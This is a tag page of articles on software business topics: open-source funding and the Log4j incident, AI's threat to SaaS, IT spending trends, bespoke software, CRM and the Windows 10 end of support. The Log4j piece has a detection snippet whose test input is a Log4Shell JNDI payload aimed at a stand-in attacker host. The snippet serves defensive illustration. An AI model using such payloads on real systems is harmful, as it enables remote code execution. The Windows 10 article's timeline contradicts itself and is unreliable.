Tag: Software

  • The economics of open source: who pays for the code the world runs on?

    Every day, as we reach for our smartphone, launch our favourite TV series or send a business email, we participate in the quiet miracle of modern technology. Beneath the shiny surface of apps and services lies an invisible foundation – open source software.

    It is millions of lines of code, written, refined and shared with the world for free by a global community. This code is the bloodstream of the internet and the backbone of the AI revolution.

    But this digital world, raised on the idea of freedom and collaboration, conceals a profound paradox. The global economy relies on an infrastructure created largely by volunteers, often balancing on the brink of professional burnout.

    It is as if global trade routes were based on bridges built as a hobby after hours. How long can such a structure last? Who actually pays for the code we all rely on?

    The invisible foundation: our global dependence

    Open source software is no longer an alternative. It has become the default building block of the digital world. Hard data paints a picture of almost total dependence. An analysis by Synopsys in 2024 showed that as much as 96% of the commercial code bases examined contained open source components.

    What’s more, on average, 77% of all code in these applications came from open source. It’s no longer a question of using individual libraries – it’s about building entire systems on a foundation created by the community.

    The scale of this dependency becomes even more striking when looking at the dynamics of consumption. In 2024, it was forecast that the total number of downloads of open source packages would reach the unimaginable figure of 6.6 trillion.

    The npm (JavaScript) ecosystem alone was responsible for 4.5 trillion requests, recording 70% year-on-year growth, while the AI-powered Python ecosystem (PyPI) grew by 87% to reach 530 billion downloads.

    The average commercial application today is a complex mosaic of an average of 526 different open source components. Each has its own life cycle, its own maintainers and its own potential problems.

    Cracks in the foundation: zombie code and a wake-up call called Log4j

    The ubiquity of open source is a double-edged sword. The same ease with which developers can incorporate off-the-shelf components into their projects leads to systemic neglect. The data is alarming: as many as 91% of the commercial code bases surveyed contain components that are ten or more versions out of date.

    This problem leads to so-called ‘zombie code’ – components that have had no development activity for more than two years. This phenomenon affects almost half (49%) of the applications on the market.

    This means that companies are building their critical systems on abandoned projects, without active support and, most importantly, without security patches. The consequence is a ticking time bomb: in just one year, the percentage of code bases containing high-risk security vulnerabilities has increased from 48% to 74%.

    Nothing illustrates this risk better than the December 2021 incident, when the world learned of the Log4j vulnerability. This small, free Java library for logging turned out to be embedded in millions of applications around the world.

    The vulnerability, named Log4Shell, received a maximum criticality rating of 10/10. An attacker could take full control of a server by sending a simple string of characters. Jen Easterly, director of the US CISA, called it one of the most serious vulnerabilities she had seen in her entire career.
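    As an illustration, the exploit behind Log4Shell was a JNDI lookup string embedded in otherwise ordinary input, such as an HTTP header. The sketch below is a hypothetical, simplified detector for that pattern, not an official tool; real payloads were often obfuscated (for example with nested lookups), so a naive check like this misses many variants.

```python
import re

# Heuristic behind many post-incident scanners: a ${jndi:...} lookup
# pointing at a remote protocol handler. Obfuscated payloads evade
# this naive pattern, so it is illustrative only.
JNDI_PATTERN = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def looks_like_log4shell(text: str) -> bool:
    """Return True if the input resembles a plain Log4Shell-style lookup."""
    return bool(JNDI_PATTERN.search(text))

print(looks_like_log4shell("${jndi:ldap://attacker.example/a}"))  # True
print(looks_like_log4shell("GET /index.html HTTP/1.1"))           # False
```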

    The Log4j incident became a global wake-up call, making companies brutally aware of how much their security depends on the work of anonymous volunteers.

    Worse still, even three years after the discovery of Log4Shell, up to 13% of all Log4j library downloads are still vulnerable versions. This demonstrates the profound inertia of organisations that fail to update their dependencies even in the face of a well-known, critical threat.

    The human cost of ‘free’ software: the burden of the maintainer

    There are people behind every line of code. A model that treats their work as a free resource generates a huge human cost. Salvatore Sanfilippo, the creator of the Redis database, described this phenomenon as the ‘flooding effect’.

    Over time, the stream of emails, GitHub issues and questions turns into a never-ending flood, which leads to guilt over not being able to help everyone.

    The scale of this pressure is illustrated by Jeff Geerling, who maintains more than 200 projects. Each day he receives between 50 and 100 notifications, of which he can deal with only a fraction.

    Nolan Lawson, another well-known maintainer, aptly captured the emotional weight of this work: notifications on GitHub are “a constant stream of negativity”. No one opens an issue to praise working code. People only post when something is wrong.

    This chronic pressure leads to burnout, which, in the context of open source, has clearly defined causes: demanding users, low quality contributions, lack of time and, most acutely, lack of remuneration.

    Knowing that work which consumes huge amounts of energy underpins commercial products that generate real profits for others is deeply demotivating. As one maintainer put it: “My software is free, but my time and attention are not.”

    Maintainer burnout is not just a personal tragedy. It is a critical risk to the global infrastructure.

    ‘Zombie code’ is a direct, measurable symptom of this crisis at the human level.

    The New Economy of Code: Towards a Sustainable Future

    In the face of these risks, the open source ecosystem is slowly maturing, moving from a volunteer-based model to more sustainable forms of funding.

    1. Corporate patrons: strategy, not altruism

    At the forefront of this transformation are the technology giants. Companies such as Google, Microsoft and Red Hat have been the biggest contributors to the open source world for years. Their motivations, however, are not altruistic – they are cold, strategic calculations.

    Joint development of fundamental components (such as operating systems or containerisation) is simply more efficient. This allows them to compete at a higher level, in areas that directly differentiate their products.

    By becoming involved in key projects, corporations can also influence their direction, ensuring alignment with their own strategy.

    2. The power of institutions: the role of foundations

    The second pillar is non-profit foundations such as the Linux Foundation and the Apache Software Foundation. They act as neutral trustees for the most important projects, ensuring their stability and independence from a single corporation.

    They collect contributions from sponsors, creating a budget that allows them to fund key developers and security audits.

    3. The maker revolution: the GitHub Sponsors model

    Alongside the big players, a new grassroots funding wave has been born. Platforms such as GitHub Sponsors allow direct, recurring contributions from users and companies, creating a revenue stream for maintainers.

    The story of Caleb Porzio, creator of Livewire and Alpine.js, is a prime example of this model’s potential. Standing on the brink of burnout, he decided to try the GitHub Sponsors programme.

    The real breakthrough came when he changed the paradigm: instead of asking for support, he decided to offer his sponsors additional, exclusive value. His secret turned out to be paid screencasts – a series of video tutorials.

    He reserved access to the full library exclusively for backers on GitHub. The effect was spectacular. His annual revenue grew by $80,000 in 90 days and crossed the $1 million threshold in the following years.

    This is a key lesson: a sustainable model does not have to be based on charity, but on building a viable business model around a free, open core.

    From free rider to stakeholder

    ‘Free’ software has never been free. Its price, hitherto hidden, has been paid with the time, energy and mental health of a global army of volunteers. The model in which we treated their work as an inexhaustible resource is coming to an end.

    It is time for every participant in this ecosystem to undergo a transformation – from passive ‘free rider’ to active stakeholder.

    This requires specific actions. Developers need to practice ‘software hygiene’ – regularly updating dependencies and consciously managing technical debt.
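    The ‘software hygiene’ described above can be approximated in tooling. Below is a minimal, illustrative Python sketch that flags dependencies which are ten or more versions behind, or have had no release for over two years – the two thresholds cited earlier in this article. The component names and dates are entirely hypothetical.

```python
from datetime import date

# Hypothetical dependency inventory: (name, versions_behind, last_release).
# Thresholds mirror the figures cited in the text: 10+ versions out of
# date, or no release for more than two years ("zombie code").
def audit(components, today=date(2025, 1, 1)):
    findings = []
    for name, versions_behind, last_release in components:
        if versions_behind >= 10:
            findings.append((name, "severely outdated"))
        elif (today - last_release).days > 2 * 365:
            findings.append((name, "zombie: no release in 2+ years"))
    return findings

deps = [
    ("logging-lib",  12, date(2021, 12, 1)),  # hypothetical entries
    ("string-utils",  0, date(2018, 3, 1)),
    ("http-client",   1, date(2024, 11, 1)),
]
for name, issue in audit(deps):
    print(f"{name}: {issue}")
```

    In practice the same thresholds can be fed from tools that list outdated packages in a given ecosystem; the point is that the policy is simple enough to automate.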

    Companies need to treat open source as a critical part of the supply chain, maintaining software bills of materials (SBOMs) and investing in business-critical projects. Investing in open source is not a cost; it is business-continuity insurance.

    We stand at the threshold of a new era for open source – an era of professionalisation and sustainability. A future where creators are fairly remunerated and the global digital infrastructure is secure is within our reach. Building it, however, requires a conscious effort from each of us.

  • Will AI kill traditional software? Tech giants fight for the market

    A debate is growing in Silicon Valley that last month wiped almost a trillion dollars off the software sector’s market valuation. The question is fundamental: will generative artificial intelligence, capable of writing code and automating processes on its own, make traditional SaaS platforms redundant? Industry leaders, from Oracle to Salesforce, have moved to counterattack, arguing that their greatest asset is not the code itself, but the unique data on which they operate.

    Oracle’s Mike Sicilia and Salesforce’s Marc Benioff reject the vision of a ‘software apocalypse’ with one voice. In recent meetings with analysts, both stressed that AI is not an existential threat, but a turbocharger for existing systems. Oracle, whose shares rose 10% after optimistic forecasts, is betting on flexibility and deep embedding in financial and logistical processes. According to analysts, it is the possession of ‘proprietary data’ that provides the most effective moat against new players such as Anthropic.

    Despite the confidence of the giants, the market remains sceptical of companies whose data is easier to replace. An example is Workday, whose share price has been hit hard. Although the company manages a huge amount of HR information, critics note that HR data often follows rigid, standardised formats. This makes it more susceptible to replication by agile AI models.

    However, Aneel Bhusri, returning CEO of Workday, raises a compelling technical argument: today’s artificial intelligence is probabilistic – based on probabilities and patterns. Meanwhile, critical corporate systems need to be deterministic; they need to deliver the same precise result every time, especially in the area of payroll or accounting.

    Instead of obituaries, market observers suggest evolution. Salesforce is promoting its Agentforce platform, and Oracle is integrating AI into its entire technology stack, from database to end-user applications. The advantage of the traditional players comes from switching costs – companies have spent decades building operations around these tools. While AI lowers the barrier to creating new software, it will not so easily replace decades of experience in managing complex business processes.

  • Is AI the end of SaaS? The myth of free code in business

    In the public debate on the future of technology, a thesis that inspires euphoria in some and existential fear in others is increasingly common. Its content is deceptively simple: since artificial intelligence can generate complete application code in a few seconds, the marginal cost of software development drops to zero. In view of the fact that any user equipped with a sophisticated language model can reproduce the architecture of a powerful system in a single afternoon, traditional companies based on the Software as a Service model would supposedly lose their raison d’être. This vision is based on a fundamental cognitive error. Confusing code syntax with business service is a trap that ignores the essence of the modern digital economy.

    The real value of software has never been in the binary instruction record itself, but in the promise that this record realises. The current fascination with free code is akin to the delight in the fact that paper and ink are cheap, which would supposedly render notarial contracts or financial analyses worthless. Meanwhile, the role of the traditional SaaS model is being dramatically strengthened. It is becoming a shield separating the customer from the chaos and unpredictability of generative algorithms.

    When considering the economic foundation of this thesis, it is worth looking at the financial structure of mature technology companies. The belief in the imminent death of the industry assumes that the programming process accounts for the lion’s share of a company’s expenditure. Operational reality, however, draws a very different picture. In mature business models, the R&D budget typically oscillates around a quarter of total revenue, and the physical process of writing code itself is only a fraction of the engineering work. Most of the resources are consumed by architectural decisions, domain modelling and interpretation of intricate user requirements. The mathematics here are inexorable: the impact of artificial intelligence on the total cost structure is a few to several per cent in real terms. This is an optimisation, not a budget revolution.
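    The arithmetic in this paragraph can be made explicit. The sketch below uses the ratio cited in the text (R&D at roughly a quarter of revenue) together with two assumed figures – the share of engineering work that is actually typing code, and how much of that cost AI eliminates – to show why the net effect lands in the low single digits of total revenue.

```python
# Back-of-the-envelope, normalised to revenue = 100.
revenue = 100.0
rnd_share = 0.25            # R&D ~ a quarter of revenue (from the text)
coding_share_of_rnd = 0.30  # assumption: typing code is ~30% of R&D work
ai_saving_on_coding = 0.50  # assumption: AI halves the cost of that part

saving = revenue * rnd_share * coding_share_of_rnd * ai_saving_on_coding
print(f"Saving as a share of total revenue: {saving:.2f}%")  # 3.75%
```

    Even with generous assumptions for the two free parameters, the product of three fractions stays small – an optimisation, not a budget revolution.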

    Moreover, the savings generated at the code-development stage are rapidly consumed by rising operational costs. Intelligence-based software does not operate in a vacuum; it requires enormous computing power. Each query to an intelligent system costs more than a traditional database lookup. As a result, the barrier to entry for new players wishing to compete solely on the price of ‘free code’ remains extremely high. It is not possible to permanently undercut the market when process costs rise along with the ambitions of the algorithms.

    In B2B relationships, trust is a rarer currency than computing power. Corporations do not pay for a collection of functions, but for system availability more than ninety-nine per cent of the time, for compliance with strict security standards, and for the certainty that data is processed according to the letter of the law. A clone of an ERP or CRM system generated by artificial intelligence remains just a digital mock-up. It lacks the legal background, certification and business continuity guarantees that constitute the operational security of the client.

    However, the problem of ‘probable rightness’ arises. In critical sectors such as banking, medicine or global logistics, an outcome that is ‘almost right’ is in fact completely wrong. These systems require a deterministic backbone – a structure that will deliver the same predictable outcome every time, regardless of the circumstances. The truly desirable software is not that which has been written entirely by artificial intelligence, but that which has been designed to be managed safely and predictably by it.

    It is worth emphasising, therefore, that the uniqueness of a solution does not come from the fact that it has code, but from the ability to turn technology into sustainable use value. The fear of devaluing the IT industry stems from the erroneous assumption that software is the end product. Meanwhile, software is merely the carrier of a service. As technology becomes more complex and unpredictable, customers will be willing to pay more and more for someone who will tame this complexity and take full responsibility for it. SaaS is undergoing a mature transformation. It is ceasing to be a tool for editing data and is becoming a guarantor of stability in an uncertain digital environment.

  • The Claude effect: Will Anthropic’s new plug-ins sink traditional software?

    A narrative is beginning to dominate Silicon Valley and global financial centres that no one would have expected a year ago: financial results are no longer enough. Despite giants such as Alphabet and Amazon reporting solid growth in the cloud computing segment, markets are reacting nervously. Investors, instead of celebrating profits, are looking anxiously at the bills the AI revolution is running up.

    The scale of spending is unprecedented. The four largest hyperscalers have signalled investment plans in excess of $600 billion this year alone. Neil Wilson, investment strategist at Saxo UK, directly suggests that the spectre of a bubble is looming over the market. This is no longer a phase of experimentation – it is a brutal war of capital destruction in which it costs hundreds of billions of dollars to enter the game, while return on investment (ROI) remains a vague promise of the future.

    The architecture of fear

    However, the concern is not just limited to spending. The real earthquake has been triggered by new tools from Anthropic, which have hit the foundations of traditional software and data analytics providers. Drops of 2-5% in one day by players such as RELX, Sage and Experian show that the market fears the ‘cannibalisation’ of legacy business models by Claude’s agile new plug-ins.

    India, where the IT outsourcing sector lost $22.5 billion in market value in a week, is particularly hard hit. If algorithms can write code and analyse data faster and cheaper than armies of programmers, the traditional technology services model needs immediate redefinition.

    Capital risk vs. operational risk

    This phenomenon creates a peculiar impasse in the technology business. On the one hand, companies need to invest in order not to fall behind. On the other, any announcement of increased CAPEX (capital expenditure) is punished immediately by shareholders. Amazon, despite its excellent operational health, lost 8% in pre-market trading precisely because of the ‘spending frenzy’.

    There is a clear message here for business leaders: the era of unconditional optimism about AI is over. What matters now is not how much a company spends on GPUs, but how quickly these investments translate into real competitive advantage to defend against the new wave of automation. Market valuations are beginning to reward not visionaries but pragmatists who can manage the cost of innovation.

  • Two-speed IT spending. AI is eating traditional IT

    We are witnessing a profound polarisation of the technology market.

    On the one hand, we are seeing segments with exponential growth. Huge investments are flowing towards building specialised computing centres for artificial intelligence. These are driven by strategic pressure and fear of losing competitiveness.

    On the other hand, fundamental business systems and industry applications are in a zone of pronounced caution. Their development is hampered by a period of business uncertainty and the exhaustion of the organisation with constant change.

    The problem is that the industry is investing heavily in building powerful computing engines, but neglecting to modernise the operating systems that would make effective use of this power.

    Mass computing power

    There is no doubt what is catalysing the rapid growth. Gartner is straightforward about the race to build AI infrastructure and the growing demand for AI-optimised servers. This is reactive action, not just calm, strategic planning.

    This dynamic is being driven by the powerful narrative of a new industrial revolution requiring dedicated computing power. This is redefining perceptions of IT spending – it is no longer an operating expense, but is becoming a strategic investment of the magnitude of building a key industrial infrastructure.

    Moreover, Gartner rightly points out that growth in demand for servers remains constrained by insufficient supply. This market situation inevitably leads to behaviour dictated by concerns about resource availability. Organisations are buying computing power not only because they have an immediate plan to use it, but also because they fear losing access to it in the future.

    This is confirmed by analysts. Their comments suggest that current spending on generative AI is coming mainly from technology companies building the infrastructure itself. The foundations are being laid, but what about the buildings that are supposed to stand on them?

    Segment                   2025 spending   Growth (%)   2026 spending   Growth (%)
    Data centre systems             489,451         46.8         582,446         19.0
    Equipment                       783,157          8.4         836,275          6.8
    Software                      1,244,308         11.9       1,433,037         15.2
    IT services                   1,719,340          6.5       1,869,269          8.7
    Communication services        1,304,165          3.8       1,363,058          4.5
    Total IT                      5,540,421         10.0       6,084,085          9.8

    (Spending in millions of US dollars; growth is year-on-year.)

    Stagnation

    This is where we arrive at the second, slower sphere of the market, where there is a completely different business climate.

    The Gartner report, the starting point of our analysis, is unequivocal on this point: growth in spending on software and services is not recovering at the same rate. In particular, industry-specific software – i.e. key systems that manage finance, logistics or production – is the most sensitive to economic fluctuations and political uncertainty.

    We are faced with a fundamental paradox: management is prepared to approve a multi-million-dollar investment in GPU clusters, but at the same time postpones the decision to upgrade an ageing ERP or CRM system.

    How is this possible? The answer lies in the redistribution of resources and human factors.

    Firstly, IT budgets are not unlimited. Other market analyses indicate that the projected growth in total IT budgets for 2025 is modest, often below the historical average. So if AI spending is growing exponentially while the overall budget grows only modestly, AI investments must be eating up resources at the expense of other projects.
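    A toy calculation makes the crowding-out effect concrete. The growth rates below are illustrative, not forecasts: a total budget growing modestly while AI spending compounds quickly leaves a shrinking residual for everything else.

```python
# Illustrative growth rates, not forecasts.
total_budget = 100.0  # normalised total IT budget
ai_spend = 10.0       # AI's initial slice of that budget

for year in range(1, 5):
    total_budget *= 1.05  # total budget grows modestly
    ai_spend *= 1.50      # AI spending compounds rapidly
    non_ai = total_budget - ai_spend
    print(f"Year {year}: non-AI budget = {non_ai:.1f}")
```

    After four years of these (assumed) rates, AI has grown fivefold while the non-AI residual has shrunk by roughly a fifth – exactly the squeeze on ERP and CRM modernisation described above.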

    Secondly, there is decision-making paralysis in organisations. After years of intensive digital transformation, forced by the pandemic, managers are less willing to embark on further complex, multi-year modernisation projects.

    The syndrome of disappointed expectations

    This growing gap between the pace of infrastructure investment and the readiness of business applications leads us straight into a trap. It’s a scenario where initial enthusiasm collides with the hard realities of implementation, leading to deep disappointment.

    Many organisations may soon be faced with having state-of-the-art AI centres idling. The reason is simple: artificial intelligence algorithms require fuel in the form of high-quality, structured data. This data, on the other hand, is very often stuck in outdated, monolithic legacy systems – the very ones in the stagnant area.

    AI to optimise the supply chain? A great idea, provided logistics systems provide real-time data. AI is to personalise customer interactions? A modern, integrated CRM system is essential for this.

    Analysts, commenting on the PC market, note that new AI-ready PCs do not yet have the key applications that would justify replacing the hardware. The same principle, albeit on a much larger scale, applies to data centres. We are building infrastructure for applications that have not yet been developed, while neglecting to upgrade the systems that are essential to their operation.

    Strategy = integration

    This dual-speed model of the IT market is inefficient in the long term and carries high strategic risk. In 2026, competitive advantage will not be built by the organisations that merely amass the most computing power. The winners will be those able to integrate it deeply and strategically into their core business processes.

    This means that the biggest challenge for IT directors today is not the technology purchase itself. It is ensuring investment consistency.

    The role of the CIO is evolving: from technology manager to key strategist, responsible for synchronising rapid infrastructure development with the necessary modernisation of business foundations.

    If this synchronisation does not happen, the projected $6 trillion, rather than a testament to a revolution, will become a monument to a global investment in potential that has never been fully realised.

  • Competitive advantage through technology: When is it worth investing in bespoke software?

    The choice of business support software is one of the key strategic decisions facing managers. The “build or buy?” dilemma goes far beyond finance and technology, defining a company’s growth path for years to come. The wrong choice can lead to inefficiency, loss of competitive advantage and even getting stuck in an expensive technology trap. While off-the-shelf solutions are tempting in terms of speed of implementation, in strategically defined circumstances, bespoke software generates a much higher long-term return on investment (ROI).

    Cost analysis: the myth of the low-cost start-up

    One of the most common mistakes is to be guided solely by the purchase price. The full financial picture is only provided by a Total Cost of Ownership (TCO) analysis, taking into account all expenses over a three- to five-year horizon. Off-the-shelf software, especially in the SaaS model, has a low entry threshold but constant recurring subscription fees. Bespoke software, on the other hand, requires a higher initial investment followed only by predictable maintenance costs, typically representing 15-25% of the original amount.

    In practice, this leads to a ‘cost crossover point’. Typically, after 2-3 years, the cumulative charges for an off-the-shelf solution equal the cost of creating bespoke software, and significantly exceed it in subsequent years. Added to this are hidden costs, such as fees for additional users, integrations or manual workarounds for missing features, which can push total expenditure up to 40% over the original assumptions.
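    The crossover logic is easy to model. In the sketch below all figures are hypothetical: maintenance is set at 20% of the build cost, within the 15-25% range cited above, and the subscription fee is chosen so the curves cross between years two and three.

```python
def cumulative_saas(annual_fee, years):
    # Pure subscription: pay the fee every year.
    return annual_fee * years

def cumulative_bespoke(build_cost, maintenance_rate, years):
    # Upfront build plus yearly maintenance at 15-25% of the build cost.
    return build_cost + build_cost * maintenance_rate * years

# Hypothetical figures: a $150k/year subscription vs a $250k build
# maintained at 20% per year.
for year in range(1, 6):
    saas = cumulative_saas(150_000, year)
    custom = cumulative_bespoke(250_000, 0.20, year)
    cheaper = "bespoke" if custom < saas else "off-the-shelf"
    print(f"Year {year}: SaaS {saas:>9,} vs bespoke {custom:>9,.0f} -> {cheaper} cheaper")
```

    A real TCO analysis would add the hidden costs mentioned above (extra users, integrations, workarounds) to the subscription side, which pulls the crossover point even earlier.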

    Strategic value: from tool to competitive advantage

    The most important advantage of bespoke software is that it fits perfectly with a company’s unique business processes. Instead of forcing the organisation to adapt and compromise, the software adapts to the organisation. Off-the-shelf systems, designed for the ‘average’ user, often force the modification of proven, unique operations. This leads to a hidden ‘process tax’, i.e. a constant loss of efficiency resulting from bending operations to the rigid framework imposed by the tool.

    Choosing bespoke software transforms technology from a freely available tool into a proprietary intellectual asset that competitors cannot copy. This allows you to build a sustainable advantage and escape the ‘sea of same technology’, where all companies in the industry, using the same platforms, begin to operate in an identical way. Market data confirms these benefits. On average, companies that invest in dedicated solutions report a 20-30% increase in operational efficiency, and those that successfully implement personalisation generate 40% more revenue. As many as 75% of IT decision-makers are convinced that this approach leads to better business results.

    Risk assessment: the dependency trap vs. project control

    Every technological decision involves risks, but the nature of these risks is fundamentally different. In the case of off-the-shelf solutions, the biggest risk is the vendor lock-in trap. The company becomes hostage to the product development plan, changes in the price list or even the decision to withdraw the service. Migrating to another system years later becomes technically complex and financially unviable. It is a chronic risk that builds up over time and gets out of control.

    The risks of bespoke software, on the other hand, are concentrated at the beginning, during the implementation phase of the project. Choosing an inexperienced partner can lead to budget overruns or delays. However, this is an acute risk, but one that is limited in time and fully manageable by the organisation. After a successful implementation, the company gains full control over the technology, its security and data.

    How to make a decision?

    In order to make the right decision, the manager should start with a strategic classification of the business need. All processes in a company can be divided into two categories: commodities and differentiators. Commodities are standard functions that are necessary for operation but do not provide an advantage, such as payroll systems. In their case, buying an off-the-shelf solution is usually the right choice. Differentiators are unique processes, proprietary algorithms or innovative customer experiences that represent a company’s strength. For these areas, you should seriously consider building your own software to protect and develop this unique resource.

    Investment in uniqueness

    The choice between bespoke software and an off-the-shelf solution is a strategic decision, not a technological one. TCO analysis exposes the myth of the cheap start-up, and building your own system allows you to turn your unique processes into a sustainable competitive advantage. Ultimately, the decision boils down to choosing a development path: one based on adapting to market standards or building your own unique path to success.

  • How the right CRM software can boost sales in B2B

    In the reality of many B2B companies, the sales process resembles chaos. Salespeople are drowning in emails, key customer information is lost in notebooks or scattered spreadsheets, and communication within the team is inconsistent. This operational clutter is a silent killer of results. Research shows that as many as 60% of leads in B2B are lost solely due to a lack of timely contact. The situation worsens when a key sales person leaves the company – all their knowledge disappears with them, breaking business continuity. Relying on Excel and email is a strategic risk that inhibits growth.

    CRM as a strategic command centre

    Implementing a CRM (Customer Relationship Management) system is a fundamental change in business philosophy that places the customer at the centre of all company activities. The system becomes a strategic command centre, enabling a shift from reactive firefighting to proactive growth management.

    The foundation of this transformation is the centralisation of data, which creates a so-called 360-degree view of the customer. All information – contact history, transactions, offers, service requests – is collected in one easily accessible place. This ensures that every employee, regardless of department, has the full context of the relationship with the company. This eliminates chaos and builds a consistent, professional image. This centralisation creates a single source of truth (Single Source of Truth) within the organisation, which is the backbone of effective collaboration and a prerequisite for implementing advanced strategies such as personalisation or automation.

    The anatomy of growth: how do CRM functions translate into results?

    The promise of increased sales is not an empty slogan. It is the result of the synergy of several key mechanisms that a CRM system sets in motion within an organisation.

    Increasing team productivity

    One of the best-documented results of CRM implementation is an increase in efficiency. Data from Nucleus Research shows that companies implementing CRM see an average increase in employee productivity of 34%, while reducing labour costs by 27%. This is because CRM automates routine tasks such as sending reminders, generating reports or preparing standard offers. This frees up valuable time for salespeople, who can focus on building relationships and finalising deals. Mobile access to the CRM further increases the productivity of employees in the field by an average of 14.6%.

    Shortening the sales cycle

    In B2B sales, time is money. CRM directly shortens the sales cycle, with studies showing reductions of 20-30%. This is made possible by intelligent lead qualification, which lets the team focus on the most promising opportunities. Instead of wasting resources on low-potential contacts, the system prioritises them, directing energy to where the likelihood of success is greatest.

    Increase in conversion and transaction value

    Access to the full history of interactions allows for the creation of personalised offers that respond precisely to the customer’s needs, which significantly increases the likelihood of conversion. By analysing the data collected, the CRM system also becomes a tool for identifying cross-selling and upselling opportunities. An Aberdeen Group study showed that companies actively using CRM for this purpose increased their revenue from these activities by 32%. In addition, analysing sales funnel data allows much more accurate forecasts to be made. According to a Salesforce study, companies using CRM have 29% more accurate sales forecasts.

    CRM is a marathon, not a sprint: the power of customer retention

    Acquiring a new customer is on average 5 to 7 times more expensive than retaining an existing one. Research published in the Harvard Business Review shows that increasing customer retention rates by just 5% can translate into a 25% to 95% increase in company profits.

    The CRM system plays a key role in building loyalty. By tracking all interactions and service requests, it enables fast, personalised after-sales support. A customer who feels looked after is more likely to stay with a company for longer. The measurable effect of this approach is that companies using CRM record an average 9.5% higher customer retention rate.
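    The retention economics above can be made concrete with a simple customer lifetime value (CLV) calculation. The sketch below uses a standard margin-and-retention model with purely illustrative numbers – a hypothetical example, not figures from the studies cited:

    ```python
    # Illustrative CLV model: a customer contributes a fixed annual margin
    # and renews each year with probability `retention`; future margins are
    # discounted at rate `discount`. Closed form of the geometric series:
    #   CLV = margin * retention / (1 + discount - retention)

    def customer_lifetime_value(margin: float, retention: float, discount: float) -> float:
        """Expected discounted value of all future margins from one customer."""
        return margin * retention / (1 + discount - retention)

    # Hypothetical figures: 1,000 annual margin, 10% discount rate.
    base = customer_lifetime_value(margin=1000, retention=0.80, discount=0.10)
    improved = customer_lifetime_value(margin=1000, retention=0.85, discount=0.10)

    # A 5-point retention gain lifts CLV disproportionately, which is why
    # small retention improvements translate into outsized profit growth.
    print(f"CLV at 80% retention: {base:.0f}")
    print(f"CLV at 85% retention: {improved:.0f}")
    print(f"Uplift: {(improved / base - 1) * 100:.1f}%")
    ```

    The denominator shrinks as retention rises, so each extra point of retention is worth more than the last – the mechanism behind the Harvard Business Review finding quoted above.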

    Key to success: how to implement CRM wisely?

    Implementing CRM is a strategic initiative that goes far beyond an IT project. In order to maximise the return on investment and avoid typical pitfalls, a thoughtful and multi-phased approach is key.

    Success begins long before specific software is selected. The foundation is an in-depth analysis of current processes and a precise definition of the goals that the system is supposed to achieve. Many implementations fail precisely because of the lack of a clear vision. Instead of general assumptions, successful companies use the SMART methodology, setting measurable goals such as ‘reducing the average sales cycle by 15% in nine months’. Such precision gives the entire project direction and allows a realistic assessment of its success.

    Another pillar is team involvement and attention to data quality. Employee resistance is one of the most serious barriers to success, so involving future users in the system selection and configuration process is crucial. When the team feels like co-authors of the solution, their motivation to use the new tool naturally increases. Equally important is the quality of the information that will feed into the system. The ‘rubbish in, rubbish out’ principle is inexorable here. Therefore, a thorough audit and cleaning of databases prior to migration is an absolute necessity to make CRM a reliable source of knowledge rather than a digital mess.

    Implementation is not the end, but the beginning of a continuous optimisation process. To be sure that the investment is delivering the expected results, it is essential to define and regularly monitor key performance indicators (KPIs). Metrics such as Win Rate or Customer Lifetime Value (CLV) provide hard data on the effectiveness of activities. This cycle of measuring results, gathering feedback from users and adjusting processes allows you to realise the full potential of your system and maximise your return on investment.
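    To make the monitoring step concrete, a metric such as Win Rate can be computed directly from closed-deal records exported from the CRM. A toy sketch with hypothetical data (field names are illustrative, not any particular CRM's schema):

    ```python
    # Minimal KPI sketch over a hypothetical export of closed deals.
    # Win Rate = deals won / deals closed; average deal size over won deals.
    deals = [
        {"stage": "won",  "value": 12000},
        {"stage": "lost", "value": 8000},
        {"stage": "won",  "value": 20000},
        {"stage": "lost", "value": 5000},
    ]

    won = [d for d in deals if d["stage"] == "won"]
    win_rate = len(won) / len(deals)
    avg_deal = sum(d["value"] for d in won) / len(won)

    print(f"Win rate: {win_rate:.0%}")          # 2 of 4 closed deals were won
    print(f"Average won deal: {avg_deal:.0f}")
    ```

    Tracking these numbers per quarter, rather than anecdotally, is what turns the feedback loop described above into measurable optimisation.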

    Investment in predictable growth

    A CRM system transforms sales from an unpredictable ‘art’ into a measurable, data-driven ‘science’. The financial argument is hard to dispute: investment in CRM is not a cost but one of the most profitable decisions a company can make. Nucleus Research puts the average return at $8.71 for every dollar invested. Implementing CRM is a strategic priority for any B2B company that aspires to a sustainable competitive advantage and dynamic, scalable growth.

  • The clock for Windows 10 is ticking. Companies face an inevitable decision

    The clock for Windows 10 is ticking. Companies face an inevitable decision

    On 14 October 2025, Microsoft will end free support for Windows 10, a date that should be highlighted in red in every IT manager’s calendar.

    After this date, computers running this system will stop receiving key security updates, making them an easy target for cyber attacks.

    Even though there is just over a year left until the end of support, a huge part of the market is still ignoring the upcoming changes. This is a mistake that could cost companies much more than the price of new licences and hardware.

    Inertia and the illusion of safety

    The market data is clear. Despite the growing popularity of Windows 11, its predecessor still dominates a huge number of machines. According to Statcounter data from August 2025, Windows 10 still runs on more than 55% of Windows PCs worldwide. Why the resistance to change?

    The reasons are understandable. Users value Windows 10 for its familiar interface and stability of operation. From a business perspective, migration is a complex project – it involves the cost of buying new hardware, verifying software compatibility and the need to train employees.

    Many companies put off this decision, following the thinking: “if the computer still works, why change it?”.

    However, this is a dangerous illusion. In the context of cyber security, the argument “it still works” has no value. A system without updates is like a house with the door wide open: every newly discovered security vulnerability will remain unpatched forever, giving attackers constant, easy access to company data. The cost of a single successful ransomware attack or data leak can outweigh the expense of an infrastructure upgrade many times over.

    A technological imperative, not a manufacturer’s whim

    There has been a lot of controversy surrounding the Windows 11 hardware requirements, but this is not due to any ill will on Microsoft’s part. Modern operating systems base their security architecture on features integrated directly into the hardware.

    These include mechanisms such as TPM 2.0 (Trusted Platform Module), a dedicated security chip that stores cryptographic keys and underpins disk encryption, and Secure Boot, which protects the boot process from malware.

    Older computers simply do not have these components, making it impossible to implement a full, multi-layered protection model. Continuing to support incompatible hardware would mean a security compromise that cannot be afforded in today’s threat landscape.

    What do we gain? New opportunities and competitive advantages

    Migrating to Windows 11 is not only a necessity dictated by security, but also an opportunity to implement tools that make a real difference to productivity.

    • Integration with AI: Functions such as Copilot are deeply integrated into the system, assisting employees in writing texts, analysing data or creating presentations. These are tools that speed up work and automate repetitive tasks.
    • Deeper integration with the cloud: Data synchronisation, backup and collaboration in distributed teams run much more smoothly in Windows 11, which is crucial in the age of hybrid working.
